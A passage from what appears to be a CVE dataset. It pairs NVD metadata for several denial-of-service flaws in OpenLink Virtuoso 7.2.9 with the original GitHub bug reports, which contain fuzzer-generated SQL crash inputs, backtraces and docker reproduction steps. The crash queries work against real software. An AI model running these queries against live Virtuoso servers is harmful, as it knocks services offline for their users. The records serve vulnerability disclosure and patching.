docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at sinv_check_exp | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1134/comments | 0 | 2023-04-12T19:29:32Z | 2023-04-14T08:12:14Z | https://github.com/openlink/virtuoso-opensource/issues/1134 | 1,665,123,657 | 1,134 | 5,143 |
CVE-2023-31625 | 2023-05-15T15:15:12.487 | An issue in the psiginfo component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1132"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1132"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1132 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1 (
x LONG VARCHAR,
a INTEGER DEFAULT 0,
b LONG VARCHAR,
t2 LONG VARCHAR
);
CREATE VIEW t1 AS SELECT * FROM t1;
INSERT INTO t1(t2, x, x) VALUES('one-toasted,one-null', '', repeat('1234567890',50000));
```
backtrace:
```c
#0 0x7f421a573900 (psiginfo+0x134a0)
#1 0x7f421a588f9a (vscanf+0x14a)
#2 0x7f421a55edf6 (__snprintf+0x96)
#3 0x5a2227 (sch_full_proc_name_1+0x2c7)
#4 0x7879a3 (sinv_find_func_map+0x143)
#5 0x788fb7 (sinv_check_exp+0x317)
#6 0x78a03d (sinv_sqlo_check_col_val+0xad)
#7 0x816d50 (sqlc_insert_view+0x330)
#8 0x81721d (sqlc_insert_view+0x7fd)
#9 0x81721d (sqlc_insert_view+0x7fd)
#10 0x81721d (sqlc_insert_view+0x7fd)
#11 0x81721d (sqlc_insert_view+0x7fd)
#12 0x81721d (sqlc_insert_view+0x7fd)
#13 0x81721d (sqlc_insert_view+0x7fd)
...
#5714 0x81721d (sqlc_insert_view+0x7fd)
#5715 0x81721d (sqlc_insert_view+0x7fd)
#5716 0x81721d (sqlc_insert_view+0x7fd)
#5717 0x6b7387 (sql_stmt_comp+0x987)
#5718 0x6ba122 (sql_compile_1+0x1a62)
#5719 0x7c8cd0 (stmt_set_query+0x340)
#5720 0x7cabc2 (sf_sql_execute+0x922)
#5721 0x7cbf4e (sf_sql_execute_w+0x17e)
#5722 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#5723 0xe1f01c (future_wrapper+0x3fc)
#5724 0xe2691e (_thread_boot+0x11e)
#5725 0x7f421a84c609 (start_thread+0xd9)
#5726 0x7f421a61c133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at psiginfo (maybe the same as #1118) | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1132/comments | 1 | 2023-04-12T19:23:55Z | 2023-04-14T08:20:16Z | https://github.com/openlink/virtuoso-opensource/issues/1132 | 1,665,117,118 | 1,132 | 5,144 |
CVE-2023-31626 | 2023-05-15T15:15:12.540 | An issue in the gpf_notice component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1129"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1129"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1129 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | **This crash seems can only be reproduced when compiling virtuoso with --with-debug.**
**When using the docker container, the SQL statement will strangely make the client shell STUCK, but will not crash the server.**
The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t4 (
a VARCHAR,
b VARCHAR
);
SELECT MIN(b), MIN(b) FROM t4;
```
backtrace:
```c
#0 0xe10319 (gpf_notice+0x209)
#1 0xdf7866 (print_object2+0x916)
#2 0x81c0e6 (select_node_input_vec+0x546)
#3 0x7b7a77 (select_node_input+0xa7)
#4 0x7ac43e (qn_input+0x3ce)
#5 0x7ac8a6 (qn_send_output+0x236)
#6 0x7ac43e (qn_input+0x3ce)
#7 0x7ac8a6 (qn_send_output+0x236)
#8 0x81e26d (set_ctr_vec_input+0x94d)
#9 0x7ac43e (qn_input+0x3ce)
#10 0x7bdc6e (qr_exec+0x11ee)
#11 0x7cb446 (sf_sql_execute+0x11a6)
#12 0x7cbf4e (sf_sql_execute_w+0x17e)
#13 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#14 0xe1f01c (future_wrapper+0x3fc)
#15 0xe2691e (_thread_boot+0x11e)
#16 0x7f02b43b7609 (start_thread+0xd9)
#17 0x7f02b4187133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at gpf_notice | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1129/comments | 0 | 2023-04-12T19:16:37Z | 2023-04-14T08:12:13Z | https://github.com/openlink/virtuoso-opensource/issues/1129 | 1,665,108,794 | 1,129 | 5,145 |
CVE-2023-31627 | 2023-05-15T15:15:12.587 | An issue in the strhash component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1140"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1140"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1140 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1 (
a varchar(255) DEFAULT NULL
);
SELECT * FROM t1 WHERE CONTAINS(*, 'tutorial & (mysql & -VÐƷWİ)');
```
backtrace:
```c
#0 0xdece40 (strhash+0x20)
#1 0xdec783 (id_hash_get+0x33)
#2 0x59c5d1 (tb_name_to_column+0x41)
#3 0x76aed1 (ot_is_defd+0x211)
#4 0x76b422 (sco_is_defd+0x372)
#5 0x775cec (sqlo_implied_columns_of_contains+0x3fc)
#6 0x77c3dc (sqlo_select_scope+0x75c)
#7 0x76d347 (sqlo_scope+0x447)
#8 0x70bd81 (sqlo_top_2+0x41)
#9 0x70b9d5 (sqlo_top_1+0x135)
#10 0x70d4c6 (sqlo_top_select+0x156)
#11 0x6b72bf (sql_stmt_comp+0x8bf)
#12 0x6ba122 (sql_compile_1+0x1a62)
#13 0x7c8cd0 (stmt_set_query+0x340)
#14 0x7cabc2 (sf_sql_execute+0x922)
#15 0x7cbf4e (sf_sql_execute_w+0x17e)
#16 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#17 0xe1f01c (future_wrapper+0x3fc)
#18 0xe2691e (_thread_boot+0x11e)
#19 0x7ff1272a6609 (start_thread+0xd9)
#20 0x7ff127076133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at strhash | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1140/comments | 0 | 2023-04-12T19:41:37Z | 2023-04-14T08:12:17Z | https://github.com/openlink/virtuoso-opensource/issues/1140 | 1,665,138,910 | 1,140 | 5,146 |
CVE-2023-31628 | 2023-05-15T15:15:12.633 | An issue in the stricmp component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1141"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1141"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1141 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE t1 (
x VARCHAR,
k VARCHAR
);
CREATE VIEW t1 AS SELECT x, k FROM t1;
INSERT INTO t1 VALUES ('x', 'y');
```
backtrace:
```c
#0 0xeff7b6 (stricmp+0x6)
#1 0x607569 (strihashcmp+0x29)
#2 0xdec7af (id_hash_get+0x5f)
#3 0x607e58 (sch_name_to_object_sc+0x58)
#4 0x6081b5 (sch_name_to_object+0xf5)
#5 0x7d8f70 (sqlc_insert+0x50)
#6 0x81721d (sqlc_insert_view+0x7fd)
#7 0x81721d (sqlc_insert_view+0x7fd)
#8 0x81721d (sqlc_insert_view+0x7fd)
#9 0x81721d (sqlc_insert_view+0x7fd)
#10 0x81721d (sqlc_insert_view+0x7fd)
...
#5737 0x81721d (sqlc_insert_view+0x7fd)
#5738 0x81721d (sqlc_insert_view+0x7fd)
#5739 0x6b7387 (sql_stmt_comp+0x987)
#5740 0x6ba122 (sql_compile_1+0x1a62)
#5741 0x7c8cd0 (stmt_set_query+0x340)
#5742 0x7cabc2 (sf_sql_execute+0x922)
#5743 0x7cbf4e (sf_sql_execute_w+0x17e)
#5744 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#5745 0xe1f01c (future_wrapper+0x3fc)
#5746 0xe2691e (_thread_boot+0x11e)
#5747 0x7fa64e4f4609 (start_thread+0xd9)
#5748 0x7fa64e2c4133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at stricmp (maybe the same as #1118) | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1141/comments | 1 | 2023-04-12T19:43:47Z | 2023-04-14T08:19:06Z | https://github.com/openlink/virtuoso-opensource/issues/1141 | 1,665,143,521 | 1,141 | 5,147 |
CVE-2023-31629 | 2023-05-15T15:15:12.677 | An issue in the sqlo_union_scope component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1139"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1139"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1139 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
SELECT CASE WHEN EXISTS (
SELECT 1 FROM t2 WHERE x=1 INTERSECT SELECT 1 FROM t2 WHERE y=2
)
THEN 1 ELSE 0 END;
```
backtrace:
```c
#0 0x76cd17 (sqlo_union_scope+0x67)
#1 0x76cd10 (sqlo_union_scope+0x60)
#2 0x76cd10 (sqlo_union_scope+0x60)
#3 0x76dc84 (sqlo_scope+0xd84)
#4 0x76d878 (sqlo_scope+0x978)
#5 0x76d2b4 (sqlo_scope+0x3b4)
#6 0x77c27a (sqlo_select_scope+0x5fa)
#7 0x76d347 (sqlo_scope+0x447)
#8 0x70bd81 (sqlo_top_2+0x41)
#9 0x70b9d5 (sqlo_top_1+0x135)
#10 0x70d4c6 (sqlo_top_select+0x156)
#11 0x6b72bf (sql_stmt_comp+0x8bf)
#12 0x6ba122 (sql_compile_1+0x1a62)
#13 0x7c8cd0 (stmt_set_query+0x340)
#14 0x7cabc2 (sf_sql_execute+0x922)
#15 0x7cbf4e (sf_sql_execute_w+0x17e)
#16 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#17 0xe1f01c (future_wrapper+0x3fc)
#18 0xe2691e (_thread_boot+0x11e)
#19 0x7faf7a35b609 (start_thread+0xd9)
#20 0x7faf7a12b133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at sqlo_union_scope | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1139/comments | 0 | 2023-04-12T19:40:20Z | 2023-04-14T08:12:16Z | https://github.com/openlink/virtuoso-opensource/issues/1139 | 1,665,136,195 | 1,139 | 5,148 |
CVE-2023-31630 | 2023-05-15T15:15:12.723 | An issue in the sqlo_query_spec component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1138"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1138"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/openlink/virtuoso-opensource/issues/1138 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"openlink",
"virtuoso-opensource"
] | The PoC is generated by my DBMS fuzzer.
```SQL
CREATE TABLE mvtest_pdt1 AS (SELECT 1 AS col1) WITH DATA;
```
backtrace:
```c
#0 0x70d571 (sqlo_query_spec+0x41)
#1 0x7da2d4 (sqlc_insert+0x13b4)
#2 0x6b7387 (sql_stmt_comp+0x987)
#3 0x6ba122 (sql_compile_1+0x1a62)
#4 0x68276d (bif_exec+0x67d)
#5 0x74b044 (ins_call_bif+0xc4)
#6 0x758f09 (code_vec_run_1+0xdf9)
#7 0x7ac431 (qn_input+0x3c1)
#8 0x7c04fa (qr_subq_exec+0x94a)
#9 0x74c001 (ins_call+0xc91)
#10 0x74d9f0 (ins_call_vec+0x320)
#11 0x751205 (code_vec_run_v+0xa25)
#12 0x7ac3ff (qn_input+0x38f)
#13 0x7bdc6e (qr_exec+0x11ee)
#14 0x7c36fe (qr_rec_exec+0x34e)
#15 0x4e4076 (sql_ddl_node_input_1+0xc96)
#16 0x4e444e (sql_ddl_node_input+0x10e)
#17 0x7b9f1b (ddl_node_input_1+0x19b)
#18 0x7ba5f7 (qn_without_ac_at+0xc7)
#19 0x7ac43e (qn_input+0x3ce)
#20 0x7bee59 (qr_dml_array_exec+0x839)
#21 0x7cb872 (sf_sql_execute+0x15d2)
#22 0x7cbf4e (sf_sql_execute_w+0x17e)
#23 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#24 0xe1f01c (future_wrapper+0x3fc)
#25 0xe2691e (_thread_boot+0x11e)
#26 0x7f3405362609 (start_thread+0xd9)
#27 0x7f3405132133 (clone+0x43)
```
ways to reproduce (write poc to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
``` | virtuoso 7.2.9 crashed at sqlo_query_spec | https://api.github.com/repos/openlink/virtuoso-opensource/issues/1138/comments | 0 | 2023-04-12T19:38:44Z | 2023-04-14T08:12:16Z | https://github.com/openlink/virtuoso-opensource/issues/1138 | 1,665,134,343 | 1,138 | 5,149 |
CVE-2023-31631 | 2023-05-15T15:15:12.777 | An issue in the sqlo_preds_contradiction component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1137"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/openlink/virtuoso-opensource/issues/1137"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*",
"matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
